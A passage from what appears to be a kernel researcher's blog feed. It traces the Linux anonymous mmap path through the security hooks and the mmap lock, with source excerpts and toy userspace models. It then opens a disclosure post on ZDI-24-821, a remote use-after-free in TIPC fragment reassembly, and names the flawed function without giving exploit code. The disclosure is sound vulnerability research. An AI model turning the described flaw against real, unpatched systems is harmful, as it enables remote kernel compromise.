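<p>If the bit twiddling isn&rsquo;t immediately obvious, here&rsquo;s a userspace sketch of the same arithmetic. The <code>DEMO_*</code> constants and helper names are my own stand-ins for the kernel&rsquo;s <code>PAGE_SHIFT</code>, <code>PAGE_SIZE</code> and <code>PAGE_MASK</code>, assuming the usual 4 KiB pages on x86_64:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;

/* Stand-ins for the kernel macros, assuming 4 KiB pages. */
#define DEMO_PAGE_SHIFT 12
#define DEMO_PAGE_SIZE  (1UL &lt;&lt; DEMO_PAGE_SHIFT)  /* 0x1000 */
#define DEMO_PAGE_MASK  (~(DEMO_PAGE_SIZE - 1))    /* clears the low 12 bits */

/* Mirrors check [0]: any of the low 12 bits set means not page aligned. */
static int off_is_page_aligned(unsigned long off)
{
    return (off &amp; ~DEMO_PAGE_MASK) == 0;
}

/* Mirrors shift [1]: convert a byte offset into a page offset. */
static unsigned long off_to_pgoff(unsigned long off)
{
    return off &gt;&gt; DEMO_PAGE_SHIFT;
}

int main(void)
{
    unsigned long offs[] = { 0x0, 0x3000, 0x3001 };
    unsigned long i;

    for (i = 0; i &lt; sizeof(offs) / sizeof(offs[0]); i++) {
        if (off_is_page_aligned(offs[i]))
            printf("off=0x%lx -&gt; pgoff=%lu\n",
                   offs[i], off_to_pgoff(offs[i]));
        else
            printf("off=0x%lx -&gt; -EINVAL (not page aligned)\n", offs[i]);
    }
    return 0;
}
</code></pre></div><p>So a byte offset of <code>0x3000</code> becomes a page offset of 3, while <code>0x3001</code> would be rejected before we ever reach <code>ksys_mmap_pgoff()</code>.</p>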
<h3 id="ksysmmappgoff"><code>ksys_mmap_pgoff()</code></h3>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">ksys_mmap_pgoff</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			      <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			      <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">MAP_ANONYMOUS</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="c1">// SNIP, we have this flag set!
</span></span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">MAP_HUGETLB</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="c1">// SNIP, we don&#39;t have this flag set!
</span></span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">retval</span> <span class="o">=</span> <span class="nf">vm_mmap_pgoff</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="nl">out_fput</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">file</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="nf">fput</span><span class="p">(</span><span class="n">file</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476">mm/mmap.c</a> (v6.11.5)</p>
<p>Well this one&rsquo;s nice and simple for us anonymous mappers! As there&rsquo;s no <code>file</code> involved and we&rsquo;re not using huge pages<a href="https://docs.kernel.org/admin-guide/mm/hugetlbpage.html">[3]</a> we cruise on into <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575"><code>vm_mmap_pgoff()</code></a>.</p>
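<p>For reference, here&rsquo;s a minimal userspace sketch of the kind of call that takes this path: a private, anonymous mapping with no file and no <code>MAP_HUGETLB</code>. The helper names (<code>map_anon()</code>, <code>anon_roundtrip()</code>) are made up for illustration, and the exact arguments are an assumption rather than a copy of the case study&rsquo;s program.</p>

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Map `len` bytes of private anonymous memory: fd is -1 (no file) and
 * MAP_HUGETLB is not set, so neither branch in ksys_mmap_pgoff() applies. */
void *map_anon(size_t len)
{
	void *addr = mmap(NULL, len, PROT_READ | PROT_WRITE,
			  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

	return addr == MAP_FAILED ? NULL : addr;
}

/* Map, touch and unmap a region. Returns 0 on success, -1 on failure. */
int anon_roundtrip(size_t len)
{
	unsigned char *p = map_anon(len);
	int ok;

	if (!p || len == 0)
		return -1;
	assert(p[0] == 0);	/* anonymous memory reads back as zero */
	memset(p, 0x41, len);	/* touch every byte of the mapping */
	ok = (p[len - 1] == 0x41);
	return (munmap(p, len) == 0 && ok) ? 0 : -1;
}
```

<p>Calling <code>anon_roundtrip(4096)</code> under a tracer is an easy way to watch the <code>mmap()</code> syscall arrive with <code>MAP_ANONYMOUS</code> set.</p>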
<h3 id="vmmmappgoff"><code>vm_mmap_pgoff()</code></h3>
<p>Hopefully we&rsquo;re warmed up now, as we&rsquo;ve got a bit more going on here!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">vm_mmap_pgoff</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flag</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">mm</span><span class="p">;</span>          <span class="c1">// [0]
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">populate</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="nf">LIST_HEAD</span><span class="p">(</span><span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">ret</span> <span class="o">=</span> <span class="nf">security_mmap_file</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flag</span><span class="p">);</span>  <span class="c1">// [1]
</span></span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ret</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">mmap_write_lock_killable</span><span class="p">(</span><span class="n">mm</span><span class="p">))</span>    <span class="c1">// [2]
</span></span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="o">-</span><span class="n">EINTR</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">ret</span> <span class="o">=</span> <span class="nf">do_mmap</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flag</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">populate</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			      <span class="o">&amp;</span><span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="nf">mmap_write_unlock</span><span class="p">(</span><span class="n">mm</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="nf">userfaultfd_unmap_complete</span><span class="p">(</span><span class="n">mm</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">populate</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">			<span class="nf">mm_populate</span><span class="p">(</span><span class="n">ret</span><span class="p">,</span> <span class="n">populate</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">mm/util.c</a> (v6.11.5)</p>
<h4 id="fetching-our-mmstruct">Fetching Our <code>mm_struct</code></h4>
<p>First we fetch a reference to an <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779"><code>mm_struct</code></a> [0], which, as we covered earlier, is a key structure that describes a process&rsquo;s virtual address space.</p>
<p><img src="https://sam4k.com/content/images/2024/12/image.png" alt=""></p>
<p>stolen from some of my old slides</p>
<p>But whose <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779"><code>mm_struct</code></a> are we grabbing? The kernel maintains a thread (i.e. a kernel stack) for each userspace process. When a userspace process makes a system call, the kernel executes in the &ldquo;context&rdquo; of that process, using its associated kernel stack.</p>
<p>Along with its own kernel stack, each process has a <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758"><code>task_struct</code></a>, which keeps important data about the process such as its <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779"><code>mm_struct</code></a>. When the kernel is executing in a process&rsquo;s context, it can fetch the <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758"><code>task_struct</code></a> of the associated userspace process via <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52"><code>current</code></a>.</p>
<p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52"><code>current</code></a> is a macro for <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L44"><code>get_current()</code></a>, which returns the <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758"><code>task_struct</code></a> of the &ldquo;current&rdquo; kernel thread. From there we can fetch our <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779"><code>mm_struct</code></a> from the task&rsquo;s <code>mm</code> member.</p>
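<p>If the <code>current</code> indirection feels a bit magic, here&rsquo;s a toy userspace model of the idea. Everything prefixed <code>toy_</code> is invented for illustration; in particular, a single global pointer stands in for whatever per-CPU bookkeeping the real kernel uses, so treat this as a sketch of the concept and not how x86 actually implements it.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-ins for the kernel structures; only the fields we need. */
struct toy_mm {
	int map_count;		/* illustrative field: number of mappings */
};

struct toy_task {
	int pid;
	struct toy_mm *mm;	/* the task's address space description */
};

/* One global "current" pointer, as if the machine had a single CPU. */
static struct toy_task *toy_current_task;

static struct toy_task *toy_get_current(void)
{
	return toy_current_task;
}
#define toy_current toy_get_current()

/* Pretend context switch: the scheduler decides which task is current. */
void toy_switch_to(struct toy_task *next)
{
	assert(next != NULL);
	toy_current_task = next;
}

/* What the handler does at [0]: nobody passes the task in as an argument,
 * the address space is found through whichever task is current. */
struct toy_mm *toy_syscall_get_mm(void)
{
	return toy_current->mm;
}
```

<p>The point is that the same handler code returns a different <code>mm</code> depending on which task was switched in before it ran.</p>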
<h4 id="a-bit-of-security">A Bit Of Security</h4>
<p>Next up we do some security checks [1], via <code>security_mmap_file()</code>. Generally, if we see a kernel function with the <code>security_</code> prefix it&rsquo;s a hook belonging to the kernel&rsquo;s modular security framework<a href="https://docs.kernel.org/admin-guide/LSM/index.html">[6]</a>.</p>
<p>Looking at the code we&rsquo;ll notice two definitions<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053">[4]</a><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849">[5]</a>, depending on whether <a href="https://cateee.net/lkddb/web-lkddb/SECURITY.html"><code>CONFIG_SECURITY</code></a> is enabled. We&rsquo;ll consider the default case, where it is enabled:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cm">/**
</span></span></span><span class="line"><span class="cl"><span class="cm"> * security_mmap_file() - Check if mmap&#39;ing a file is allowed
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @file: file
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @prot: protection applied by the kernel
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @flags: flags
</span></span></span><span class="line"><span class="cl"><span class="cm"> *
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Check permissions for a mmap operation.  The @file may be NULL, e.g. if
</span></span></span><span class="line"><span class="cl"><span class="cm"> * mapping anonymous memory.
</span></span></span><span class="line"><span class="cl"><span class="cm"> *
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Return: Returns 0 if permission is granted.
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">security_mmap_file</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		       <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">call_int_hook</span><span class="p">(</span><span class="n">mmap_file</span><span class="p">,</span> <span class="n">file</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="nf">mmap_prot</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">prot</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">			     <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2860">security/security.c</a> (v6.11.5)</p>
<p>If we look for references to <code>mmap_file</code>, we can see these hooks are registered by the <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/lsm_hooks.h#L114"><code>LSM_HOOK_INIT()</code></a> macro and that different security modules implement their own <code>mmap_file</code> hooks (e.g. capabilities, apparmor, selinux, smack).</p>
<p>Multiple security modules can be active on a system: the capabilities module is always active, along with any number of &ldquo;minor&rdquo; modules and up to one &ldquo;major&rdquo; module (e.g. apparmor, selinux). We can check which ones are active via <code>/sys/kernel/security/lsm</code>; the output on my VM is:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ cat /sys/kernel/security/lsm
</span></span><span class="line"><span class="cl">lockdown,capability,landlock,yama,apparmor
</span></span></code></pre></div><p>Of these, the capability and apparmor security modules both define hooks for <code>mmap_file</code>. In this case, both hooks will be run when <code>security_mmap_file()</code> is called.</p>
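<p>If you&rsquo;d rather check for a specific module programmatically, the list is just comma-separated names. Below is a small sketch of a matcher; <code>lsm_is_active()</code> is a made-up helper name, and it operates on a string you&rsquo;ve already read from <code>/sys/kernel/security/lsm</code>.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Return true if `name` appears as a whole entry in a comma-separated
 * LSM list, such as the contents of /sys/kernel/security/lsm. */
bool lsm_is_active(const char *list, const char *name)
{
	size_t name_len = strlen(name);
	const char *p = list;

	assert(name_len > 0);
	while (*p) {
		/* Length of this entry, up to a ',' or newline or the end. */
		size_t entry_len = strcspn(p, ",\n");

		if (entry_len == name_len && strncmp(p, name, name_len) == 0)
			return true;
		p += entry_len;
		if (*p)
			p++;	/* skip the separator */
	}
	return false;
}
```

<p>Matching whole entries matters here: a prefix check would happily report <code>cap</code> as active just because <code>capability</code> is.</p>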
<p><img src="https://sam4k.com/content/images/2024/12/pat_down.gif" alt=""></p>
<p>I hope that was interesting, because in our example neither of these checks actually does anything. Capabilities&rsquo; <a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/commoncap.c#L1436"><code>cap_mmap_file()</code></a> always returns success and apparmor&rsquo;s <a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/apparmor/lsm.c#L582"><code>apparmor_mmap_file()</code></a> only does checks if a <code>file</code> is specified.</p>
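<p>To make the &ldquo;several modules, one call&rdquo; idea a bit more concrete, here&rsquo;s a toy userspace model of a hook chain. It assumes the chain stops at the first hook that returns non-zero; the <code>toy_</code> names, the simplified three-argument signature and the &ldquo;deny every file&rdquo; apparmor policy are all invented for illustration and are not the kernel&rsquo;s actual code.</p>

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Toy hook signature, loosely following the mmap_file hook's arguments. */
typedef int (*toy_mmap_file_hook)(const void *file, unsigned long prot,
				  unsigned long flags);

/* Mirrors the behaviour described above: always allow. */
int toy_cap_mmap_file(const void *file, unsigned long prot,
		      unsigned long flags)
{
	(void)file; (void)prot; (void)flags;
	return 0;
}

/* Only has an opinion when a file is involved (the policy is made up). */
int toy_apparmor_mmap_file(const void *file, unsigned long prot,
			   unsigned long flags)
{
	(void)prot; (void)flags;
	return file ? -EACCES : 0;
}

/* Call each registered hook in order and stop at the first one that
 * returns non-zero, i.e. the first module that denies the request. */
int toy_security_mmap_file(const toy_mmap_file_hook *hooks, size_t n,
			   const void *file, unsigned long prot,
			   unsigned long flags)
{
	int rc = 0;

	assert(hooks != NULL || n == 0);
	for (size_t i = 0; i < n; i++) {
		rc = hooks[i](file, prot, flags);
		if (rc != 0)
			break;
	}
	return rc;
}
```

<p>With a <code>NULL</code> file, as in our anonymous mapping, every toy hook returns 0 and the call is allowed, which matches what we saw above.</p>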
<h4 id="locking">Locking</h4>
<p>Before we delve another call deeper into the mm subsystem, let&rsquo;s quickly talk about locking. The call to <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255"><code>do_mmap()</code></a> is protected by the mmap write lock [2]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">vm_mmap_pgoff</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flag</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl"><span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">mmap_write_lock_killable</span><span class="p">(</span><span class="n">mm</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="o">-</span><span class="n">EINTR</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">ret</span> <span class="o">=</span> <span class="nf">do_mmap</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flag</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">populate</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			      <span class="o">&amp;</span><span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="nf">mmap_write_unlock</span><span class="p">(</span><span class="n">mm</span><span class="p">);</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">mm/util.c</a> (v6.11.5)</p>
<p>Locking is extremely important within the kernel and is used to protect shared resources by serialising access or preventing concurrent writes. Insufficient locking can lead to all sorts of undefined behaviour and security issues.</p>
<p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117"><code>mmap_write_lock_killable()</code></a> provides a wrapper for the <code>mm-&gt;mmap_lock</code>, which is a R/W semaphore. In layman&rsquo;s terms, either multiple &ldquo;readers&rdquo; can hold this lock at once (i.e. if the calling code only plans to read the protected resource) or a single writer can [7].</p>
<p>So what does the mmap lock actually protect? That&rsquo;s a great question and I&rsquo;m not sure there&rsquo;s a definitive, detailed &ldquo;specification&rdquo; or anything for this (?). More generally though, it protects access to a process&rsquo;s address space. We&rsquo;ll understand more about what that entails as we delve deeper, but think adding/changing/removing mappings as well as other fields within the <code>mm</code> structure too [8].</p>
<p>For the curious, the <code>_killable</code> suffix indicates that the process can be killed while waiting for the lock [9][10], in which case the function returns an error, which is caught here.</p>
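<p>The &ldquo;many readers or one writer&rdquo; rule described above can be sketched with a tiny state machine. This is a toy: it isn&rsquo;t thread-safe, never sleeps and has nothing to do with how the kernel&rsquo;s rw semaphores are implemented; the <code>toy_</code> names are made up. It only models who is allowed to hold the lock at the same time.</p>

```c
#include <assert.h>
#include <stdbool.h>

/* Toy reader/writer lock state (no atomics, no waiting). */
struct toy_rwsem {
	unsigned int readers;	/* number of current read holders */
	bool writer;		/* true while a writer holds the lock */
};

/* A reader gets in unless a writer currently holds the lock. */
bool toy_read_trylock(struct toy_rwsem *sem)
{
	if (sem->writer)
		return false;
	sem->readers++;
	return true;
}

void toy_read_unlock(struct toy_rwsem *sem)
{
	assert(sem->readers > 0);
	sem->readers--;
}

/* A writer needs exclusive access: no readers and no other writer. */
bool toy_write_trylock(struct toy_rwsem *sem)
{
	if (sem->writer || sem->readers > 0)
		return false;
	sem->writer = true;
	return true;
}

void toy_write_unlock(struct toy_rwsem *sem)
{
	assert(sem->writer);
	sem->writer = false;
}
```

<p>In this model <code>vm_mmap_pgoff()</code> plays the writer: while it holds the lock to change the address space, nobody else gets to read or modify it.</p>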
<hr>
<ol>
<li><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">https://man7.org/linux/man-pages/man2/mmap.2.html</a></li>
<li>If you&rsquo;re testing this at home, be mindful that other places will call <code>do_mmap()</code>, particularly when running a program</li>
<li><a href="https://docs.kernel.org/admin-guide/mm/hugetlbpage.html">https://docs.kernel.org/admin-guide/mm/hugetlbpage.html</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053">https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849">https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849</a></li>
<li><a href="https://docs.kernel.org/admin-guide/LSM/index.html">https://docs.kernel.org/admin-guide/LSM/index.html</a></li>
<li>Check out Linux Inside&rsquo;s deep dive into semaphores <a href="https://0xax.gitbooks.io/linux-insides/content/SyncPrim/linux-sync-3.html">here</a>.</li>
<li>LWN has a good article, <a href="https://lwn.net/Articles/893906/">&ldquo;The ongoing search for mmap_lock scalability&rdquo;</a> (2022), on the importance of the <code>mmap_lock</code> and attempts to scale it</li>
<li>The <code>_killable</code> variant for rw semaphores was actually added in 2016, you can check out the <a href="https://lwn.net/Articles/677962/">initial patch series</a> for details</li>
<li><a href="https://medium.com/geekculture/the-linux-kernel-locking-api-and-shared-objects-1169c2ae88ff">&ldquo;The Linux Kernel Locking API and Shared Objects&rdquo;</a> (2021) by Pakt is a nice resource on locking if you want to dive into the topic a bit more</li>
</ol>
<h2 id="next-time">Next Time</h2>
<p><img src="https://sam4k.com/content/images/2024/12/tired_baby.gif" alt=""></p>
<p>Hopefully this isn&rsquo;t too much of a cliffhanger, but this post has been in my drafts for far too long now and I fear if I don&rsquo;t post it soon it&rsquo;ll never get finished 💀.</p>
<p>I went for a bit of a different approach with this topic, due to the scope of the mm subsystem. The aim was to use a simple case study to provide some structure and context to an otherwise complex topic. I also wanted to present an approach and workflow that could perhaps be transferable to researching other parts of the kernel, if that makes sense?</p>
<p>If folks are interested in a part 2, we&rsquo;ll continue to delve deeper into the mm subsystem, carrying on where we left off with <code>do_mmap()</code>. We&rsquo;ve barely scratched the surface so far! I&rsquo;d love to go into more detail on how mappings are represented and managed within the kernel and then move onto paging and who knows what other topics we stumble into.</p>
<p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>
]]></content:encoded></item><item><title>ZDI-24-821: A Remote UAF in The Kernel's net/tipc</title><description>In this post I discuss a vulnerability which  allows a local, or remote attacker, to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel.</description><link>https://sam4k.com/zdi-24-821-a-remote-use-after-free-in-the-kernels-net-tipc/</link><guid isPermaLink="false">6670c154de619fc1154ef4d4</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Wed, 03 Jul 2024 13:59:40 +0000</pubDate><media:content url="https://sam4k.com/content/images/2024/06/computer_wizard.gif" medium="image"/><content:encoded><![CDATA[<p>While preparing for my talk at TyphoonCon, <a href="https://github.com/sam4k/talk-slides/blob/main/so_you_wanna_find_bugs_in_the_linux_kernel.pdf">about how to find bugs in the Linux kernel</a>, I discovered a neat little vulnerability in the kernel&rsquo;s TIPC networking stack.</p>
<p>I found this while playing around with syzkaller as part of the research for my talk; I felt like it would only be fair to find some bugs to share if I&rsquo;m doing a talk about it :)</p>
<p>I picked the TIPC protocol for a few reasons: it had low coverage, net surface is fun, it&rsquo;s not enabled by default (not out here trying to find critical RCEs for a slide example) plus I have some previous experience working with the protocol.</p>
<p>In this post I&rsquo;m mainly going to be talking about the vulnerability itself, remediation and maybe I&rsquo;ll go a little bit into exploitation cos I can&rsquo;t help myself. If I can find the time, I&rsquo;d love to do a future post talking more about the discovery process and exploitation.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#overview">Overview</a>
<ul>
<li><a href="#timeline">Timeline</a></li>
</ul>
</li>
<li><a href="#background-stuff">Background Stuff</a>
<ul>
<li><a href="#net-basics">net/ Basics</a>
<ul>
<li><a href="#struct-skbuff">struct sk_buff</a></li>
<li><a href="#struct-skbsharedinfo">struct skb_shared_info</a></li>
</ul>
</li>
<li><a href="#tipc-primer">TIPC Primer</a></li>
</ul>
</li>
<li><a href="#the-vulnerability">The Vulnerability</a>
<ul>
<li><a href="#exploring-the-call-trace">Exploring The Call Trace</a></li>
<li><a href="#examining-tipcbufappend">Examining tipc_buf_append()</a></li>
<li><a href="#variations">Variations</a></li>
</ul>
</li>
<li><a href="#exploitation">Exploitation</a></li>
<li><a href="#fix-remediation">Fix + Remediation</a></li>
<li><a href="#wrapup">Wrapup</a></li>
</ul>
<h2 id="overview">Overview</h2>
<p>The vulnerability allows a local or remote attacker to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel.</p>
<p>Only systems with the TIPC module built (<code>CONFIG_TIPC=y</code>/<code>CONFIG_TIPC=m</code>) and loaded are vulnerable. Additionally, in order to be vulnerable to a remote attack the system must have TIPC configured on an interface reachable by an attacker.</p>
<p>The flaw exists in the implementation of TIPC message fragment reassembly, specifically <code>tipc_buf_append()</code>. The function carries out the reassembly by chaining the fragmented packet buffers together. It takes the first fragment as the head buffer and then processes subsequent fragments sequentially, adding their packet buffers onto the head buffer&rsquo;s chain.</p>
